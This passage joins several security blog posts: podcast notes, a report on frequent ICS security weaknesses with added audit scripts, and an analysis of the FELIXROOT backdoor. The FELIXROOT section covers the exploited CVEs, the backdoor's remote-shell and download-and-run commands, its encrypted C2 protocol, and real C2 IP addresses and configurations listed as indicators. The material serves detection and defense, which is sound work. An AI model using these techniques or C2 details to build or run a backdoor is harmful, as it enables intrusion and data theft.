Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF



Beers with Talos (BWT) Podcast Ep. #39 is now available. Download this episode and subscribe to Beers with Talos:


Ep. #39 show notes: 

Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.

The timeline:

The topics

01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots

The links

Péter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true

==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).


ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated of high or critical risk. This means they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would have stopped threat actors, or at least made it considerably harder for them, to reach an organization's systems. The implications are significant: specialized malware or actors targeting infrastructure would likely look for these flaws first and exploit them throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy and include procedures to implement patches and updates on key assets. More information is provided in the National Institute of Standards and Technology (NIST) Guide to Industrial Control Systems (ICS) Security, NIST SP 800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.

Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.

Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.
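The packet-capture review described earlier (validating the intended design against observed flows, and hunting for dual-homed hosts and business traffic on the plant network) can be scripted. The following is an added example, not code from the FireEye post or from Mandiant's toolset: it assumes a hypothetical three-zone layout (corporate, DMZ, ICS) with made-up address ranges, an assumed allowlist of industrial protocol ports, and a constructed asset inventory and flow list of the kind one would summarise from a capture.

```python
import ipaddress

# Zone layout assumed for this example (not from the post): a three-zone
# design in which corporate and ICS only talk to each other through the DMZ.
ZONES = {
    "corporate": ipaddress.ip_network("10.10.0.0/16"),
    "dmz": ipaddress.ip_network("10.20.0.0/24"),
    "ics": ipaddress.ip_network("192.168.100.0/24"),
}

# Industrial protocols expected inside the ICS zone (assumed allowlist):
# Modbus/TCP, Siemens S7, EtherNet/IP, OPC UA, DNP3.
CONTROL_PORTS = {502, 102, 44818, 4840, 20000}


def zone_of(ip):
    """Map an address to a zone name; anything outside the three zones is 'internet'."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet"


def audit(inventory, flows):
    """inventory: {hostname: [ip, ...]} from the asset list built in the workshop.
    flows: [(src_ip, dst_ip, dst_port, proto), ...] summarised from a packet capture.
    Returns a dict of finding lists keyed by category."""
    findings = {
        "direct_it_to_ics": [],          # corporate <-> ICS without passing the DMZ
        "internet_exposure": [],         # ICS <-> anything outside the three zones
        "business_traffic_in_ics": [],   # non-control protocols on the plant network
        "dual_homed": [],                # host with interfaces in two zones
    }
    for src, dst, port, proto in flows:
        sz, dz = zone_of(src), zone_of(dst)
        flow = (src, dst, port, proto)
        if {sz, dz} == {"corporate", "ics"}:
            findings["direct_it_to_ics"].append(flow)
        if "internet" in (sz, dz) and "ics" in (sz, dz):
            findings["internet_exposure"].append(flow)
        if sz == dz == "ics" and port not in CONTROL_PORTS:
            findings["business_traffic_in_ics"].append(flow)
    for host, ips in inventory.items():
        zones = sorted({zone_of(ip) for ip in ips})
        if len(zones) > 1:
            findings["dual_homed"].append((host, zones))
    return findings


# Constructed sample data, not from any real engagement.
SAMPLE_INVENTORY = {
    "hist01": ["10.10.5.20", "192.168.100.20"],   # historian with a NIC in each network
    "eng-ws": ["192.168.100.30"],
    "dmz-mirror": ["10.20.0.5"],
}
SAMPLE_FLOWS = [
    ("10.10.5.20", "192.168.100.10", 502, "tcp"),      # corporate address polling a PLC directly
    ("10.20.0.5", "192.168.100.20", 1433, "tcp"),      # DMZ mirror pulling from the historian: expected
    ("192.168.100.30", "203.0.113.9", 443, "tcp"),     # engineering workstation out to the internet
    ("192.168.100.30", "192.168.100.40", 445, "tcp"),  # SMB backup job inside the plant network
    ("192.168.100.30", "192.168.100.10", 502, "tcp"),  # normal Modbus traffic
]

if __name__ == "__main__":
    for category, items in audit(SAMPLE_INVENTORY, SAMPLE_FLOWS).items():
        print(category, items)
```

Run against a real capture, the flow list would come from something like a Zeek conn.log or a NetFlow export; the zone table and port allowlist are the parts that have to be agreed with the site engineers in the workshop, because an unexpected flow is only a finding once the intended design is written down.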


Figure 3: Reference architecture for segmentation of enterprise and control system networks

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring

We identified a lack of network security monitoring, intrusion detection, and intrusion prevention in organizations, including missing endpoint malware protection, unused network ports left active, and limited visibility into ICS networks. We recommend the following best practices:

  • Define and implement a comprehensive network security monitoring strategy at the ICS level as part of an overarching ICS security program. Pay special attention to monitoring the network segments where external connectivity occurs.
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host- or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that detects and prevents malware and malicious activity without relying on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.

Misconfigurations in Firewall Rules

We identified weak firewall rules including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions allowing access to administrative services, and lack of console connection timeouts. We recommend the following best practices for secure firewall configuration:

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
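A ruleset can be checked against these six points mechanically. The block below is an added example, not a tool from the post or from any firewall vendor: it lints a hypothetical rule list (constructed here; the dictionary layout, the administrative-port set, and the console-timeout argument are assumptions) for ANY-ANY and over-broad allow rules, unspecified protocols and ICMP types, reject instead of drop, rules shadowed by earlier ones, and reliance on the default action.

```python
import ipaddress

ADMIN_PORTS = {22, 23, 3389, 5900}   # assumed list of administrative services


def _field(rule, name):
    """Missing or None fields are treated as 'any'."""
    value = rule.get(name)
    return "any" if value is None else value


def _covers(name, a, b):
    """True if value a of field `name` matches everything that value b matches."""
    if a == "any":
        return True
    if b == "any":
        return False
    if name in ("src", "dst"):
        return ipaddress.ip_network(b, strict=False).subnet_of(
            ipaddress.ip_network(a, strict=False))
    return a == b


def lint_rules(rules, console_timeout_minutes=None):
    """Return (rule name, problem) pairs for an ordered list of rule dicts with keys
    name, action (allow/drop/reject), src, dst, proto (tcp/udp/icmp/any), dport, icmp_type."""
    findings = []
    for i, r in enumerate(rules):
        name, action, proto = r["name"], _field(r, "action"), _field(r, "proto")
        allow = action == "allow"
        src, dst = _field(r, "src"), _field(r, "dst")
        if action not in ("allow", "drop", "reject"):
            findings.append((name, "no explicit action, relies on the default policy"))
        if action == "reject":
            findings.append((name, "rejects (sends a response) instead of dropping"))
        if allow and src == "any" and dst == "any":
            findings.append((name, "ANY-ANY allow rule"))
        elif allow and "any" in (src, dst):
            findings.append((name, "allow rule without specific source and destination"))
        if allow and proto == "any":
            findings.append((name, "allow rule without a specific protocol"))
        if allow and proto in ("tcp", "udp") and _field(r, "dport") == "any":
            findings.append((name, "allow rule without a specific destination port"))
        if proto == "icmp" and _field(r, "icmp_type") == "any":
            findings.append((name, "ICMP rule without a message type"))
        if allow and src == "any" and _field(r, "dport") in ADMIN_PORTS:
            findings.append((name, "administrative service reachable from any source"))
        # A rule is dead if an earlier rule already matches everything it matches.
        for earlier in rules[:i]:
            if all(_covers(f, _field(earlier, f), _field(r, f))
                   for f in ("src", "dst", "proto", "dport")):
                findings.append((name, f"never matches: shadowed by earlier rule '{earlier['name']}'"))
                break
    last = rules[-1] if rules else {}
    if not (_field(last, "src") == "any" and _field(last, "dst") == "any"
            and _field(last, "proto") == "any" and _field(last, "action") == "drop"):
        findings.append(("<ruleset>", "no explicit final drop-all rule, relies on the default action"))
    if not console_timeout_minutes:
        findings.append(("<device>", "no administrative session timeout configured"))
    return findings


# Constructed sample ruleset, not from any real engagement.
SAMPLE_RULES = [
    {"name": "dmz-mirror-to-historian", "action": "allow", "src": "10.20.0.5/32",
     "dst": "192.168.100.0/24", "proto": "tcp", "dport": 1433},
    {"name": "vendor-ssh", "action": "allow", "src": "any",
     "dst": "192.168.100.1/32", "proto": "tcp", "dport": 22},
    {"name": "dmz-ping", "action": "allow", "src": "10.20.0.0/24",
     "dst": "192.168.100.0/24", "proto": "icmp"},
    {"name": "historian-sql", "action": "allow", "src": "10.20.0.5/32",
     "dst": "192.168.100.20/32", "proto": "tcp", "dport": 1433},
    {"name": "cleanup", "action": "reject", "src": "any", "dst": "any", "proto": "any"},
]

if __name__ == "__main__":
    for finding in lint_rules(SAMPLE_RULES):
        print(finding)
```

The shadowing check is deliberately conservative: it only reports a later rule that is entirely covered by an earlier one, which is the "overlapping rules" case that silently turns a narrow rule into a no-op. Partial overlaps with conflicting actions are worth a manual look but are not flagged here.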

Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We strongly recommend that organizations establish ICS security programs that prioritize the following:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. The trends align with risk areas commonly discussed in security conference talks and media reports, but this post draws on dozens of on-site assessments, so the observations are grounded in real environments rather than anecdote.

Our findings indicate that roughly one third (32 percent) of the critical and high security risks in ICS are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners, who must oversee the daily operation of thousands of assets in complex industrial environments. It is also worth highlighting that some of the most common risks we identified could be mitigated with basic security practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or would like to request Mandiant services, please visit our website.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.


Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). The downloaded file is weaponized with CVE-2017-11882.


Figure 2: Lure documents


Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.


Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary that the CVE-2017-11882 exploit writes to %temp% through the Equation Editor process (EQNEDT32.EXE). That file in turn drops an executable in %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which drops and executes the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.


Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.


Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.


Figure 7: Unicode decryption routine
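The post shows the decryption routines only as disassembly screenshots, so the exact byte layout is not reproduced here. As an added example (not FireEye's code), the block below implements a repeating 4-byte XOR of the kind the post describes, for both ASCII and UTF-16LE strings, and shows two things an analyst does with such a scheme: recover the key from a known plaintext (the WMI namespace names the post lists are convenient candidates) and carve decrypted strings out of a memory buffer by trying all four key phases. The key and the sample buffer are constructed for the demo and are not the real FELIXROOT key.

```python
PRINTABLE = set(range(0x20, 0x7F))


def xor4(data, key):
    """Repeating 4-byte XOR. XOR is its own inverse, so this both encodes and decodes."""
    if len(key) != 4:
        raise ValueError("key must be exactly 4 bytes")
    return bytes(b ^ key[i % 4] for i, b in enumerate(data))


def decode_ascii(blob, key):
    """Decrypt a NUL-terminated ASCII string."""
    return xor4(blob, key).split(b"\x00", 1)[0].decode("ascii")


def decode_unicode(blob, key):
    """Decrypt a UTF-16LE string terminated by a double NUL on an even boundary."""
    plain = xor4(blob, key)
    end = len(plain)
    for i in range(0, len(plain) - 1, 2):
        if plain[i:i + 2] == b"\x00\x00":
            end = i
            break
    return plain[:end].decode("utf-16-le")


def recover_key(blob, known_plaintext, unicode=False):
    """Known-plaintext attack: with a repeating 4-byte key, the first four
    ciphertext bytes XOR the first four plaintext bytes give the key."""
    plain = known_plaintext.encode("utf-16-le" if unicode else "ascii")
    if len(plain) < 4 or len(blob) < 4:
        raise ValueError("need at least four bytes of plaintext and ciphertext")
    return bytes(c ^ p for c, p in zip(blob[:4], plain[:4]))


def _ascii_runs(plain, min_len):
    runs, current = set(), bytearray()
    for b in plain + b"\x00":          # trailing NUL flushes the last run
        if b in PRINTABLE:
            current.append(b)
        else:
            if len(current) >= min_len:
                runs.add(current.decode("ascii"))
            current = bytearray()
    return runs


def _utf16_runs(plain, min_len):
    runs, i = set(), 0
    while i + 1 < len(plain):
        j = i
        while j + 1 < len(plain) and plain[j] in PRINTABLE and plain[j + 1] == 0:
            j += 2
        if (j - i) // 2 >= min_len:
            runs.add(plain[i:j].decode("utf-16-le"))
        i = j if j > i else i + 1
    return runs


def carve_strings(buf, key, min_len=6):
    """Each string is encrypted starting from key[0], but its offset in the
    buffer is arbitrary, so try all four key phases and keep printable runs."""
    found = set()
    for shift in range(4):
        rotated = bytes(key[(i - shift) % 4] for i in range(4))
        plain = xor4(buf, rotated)
        found |= _ascii_runs(plain, min_len)
        found |= _utf16_runs(plain, min_len)
    return found


# Constructed demo data: an assumed key (every byte non-printable, so zero
# padding never decodes as text) and a buffer holding one ASCII and one
# UTF-16LE string at unrelated offsets. Not the real FELIXROOT key.
SAMPLE_KEY = b"\x9f\x13\xc4\xe7"
SAMPLE_BLOB = (b"\x00" * 3
               + xor4(b"ROOT\\CIMV2\x00", SAMPLE_KEY)
               + b"\x00" * 5
               + xor4("Root\\SecurityCenter2".encode("utf-16-le") + b"\x00\x00", SAMPLE_KEY))

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB[3:], "ROOT\\CIMV2")
    print("recovered key:", key.hex())
    print(sorted(carve_strings(SAMPLE_BLOB, key)))
```

The phase trick matters in practice: a sample usually XORs each string independently from key[0], so decrypting a whole memory region with one fixed alignment only recovers the strings that happen to sit on the right boundary. Carving under wrong phases also yields junk runs, which is why the results are a superset to be filtered rather than a clean list.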

Upon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.


Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referenced from the ROOT\CIMV2 and ROOT\SecurityCenter2 namespaces.

ROOT\CIMV2:
  • Win32_OperatingSystem
  • Win32_ComputerSystem
  • Win32_UserAccount
  • Win32_NetworkAdapter
  • Win32_Process

ROOT\SecurityCenter2:
  • AntiSpywareProduct
  • AntiVirusProduct
  • FirewallProduct

Table 1: Referenced WMI classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem

Registry entries are read to assess the User Account Control (UAC) prompt settings, which bear on privilege escalation, and to collect proxy information:

  1. The key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” is queried for the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. The key “Software\Microsoft\Windows\CurrentVersion\Internet Settings” is queried for proxy information via the values ProxyEnable, Proxy: (NO), Proxy, and ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.

Command   Description
0x31      Fingerprint system via WMI and registry
0x32      Drop file and execute
0x33      Remote shell
0x34      Terminate connection with C2
0x35      Download and run batch script
0x36      Download file to machine
0x37      Upload file

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.


Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP or HTTPS POST requests. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted to Base64, and sent to the C2 server (Figure 10).


Figure 10: POST request to C2 server

The other request header fields, such as User-Agent, Content-Type, and Accept-Encoding, are stored XOR-encrypted in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, and processor architecture, and adds two further values, “1.3” and “KdfrJKN”. The value “KdfrJKN” may be a campaign identifier; it is also found in the JSON configuration object in the file (Figure 11).


Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter carries information about the task performed on the target machine (Table 3).

Parameter   Description
u=          Target machine information in the format: <Computer Name>, <User Name>, <Windows Version>, <Processor Architecture>, <1.3>, <KdfrJKN>, <Volume Serial Number>
&h=         Information about the command executed and its results
&p=         Data associated with the C2 server

Table 3: FELIXROOT backdoor parameters

Cryptography

All data is transferred to C2 servers using AES encryption, sent over HTTP or HTTPS through the IBindCtx COM interface. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.


Figure 12: RSA public key 1


Figure 13: RSA public key 2


Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.


Figure 15: Structure used to send data to server


Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.

FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Conclusion

CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities we currently see. Threat actors will keep leveraging them until they stop finding success, so organizations must ensure the available patches are deployed. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine recognizes and blocks this threat. We also advise that all industries remain on alert, as the threat actors behind this campaign may eventually broaden the scope of their targeting.

Appendix

Indicators of Compromise

MD5                                 File
11227ECA89CC053FB189FAC3EBF27497    Seminar.rtf
4DE5ADB865B5198B4F2593AD436FCEFF    Seminar.rtf
78734CD268E5C9AB4184E1BBE21A6EB9    Zam<RandomNumber>.doc
92F63B1227A6B37335495F9BCB939EA2    FELIXROOT Dropper
DE10A32129650849CEAF4009E660F72F    FELIXROOT Backdoor

Table 4: FELIXROOT IOCs

Network Indicators of Compromise

217.12.204.100/news

217.12.204.100:443/news

193.23.181.151/Seminar.rtf

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "https://88.198.13.116:8443/xmlservice","2" : "30","4" : "GufseGHbc","6" : "3", "7" : "http://88.198.13.116:8080/xmlservice"}

Version 2:

{"1" : "https://217.12.204.100/news/","2" : "30","4" : "KdfrJKN","6" : "3", "7" : "http://217.12.204.100/news/"}

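The configuration blobs and network indicators above can be turned into a proxy-log check. The following is an added example, not part of the FireEye post: it parses the two configuration objects (only keys "1", "7" and "4" are interpreted, as the post explains those; "2" and "6" are left alone), merges them with the appendix's host/path indicators, and flags matching requests in a constructed tab-separated proxy log whose format is an assumption. It also raises a weaker signal for POSTs to bare IP addresses that carry one of the hard-coded Internet Explorer User-Agent strings, since those strings on their own are common enough that matching on them would be noisy.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Configuration blobs reproduced from the post's appendix. The post explains
# keys "1" and "7" (HTTPS and HTTP C2 URLs) and suggests "4" is a campaign
# identifier; "2" and "6" are not explained, so they are not interpreted here.
CONFIG_BLOBS = [
    '{"1" : "https://88.198.13.116:8443/xmlservice","2" : "30","4" : "GufseGHbc",'
    '"6" : "3", "7" : "http://88.198.13.116:8080/xmlservice"}',
    '{"1" : "https://217.12.204.100/news/","2" : "30","4" : "KdfrJKN",'
    '"6" : "3", "7" : "http://217.12.204.100/news/"}',
]
# host[:port]/path indicators from the appendix; no port means any port.
EXTRA_INDICATORS = ["217.12.204.100/news", "217.12.204.100:443/news",
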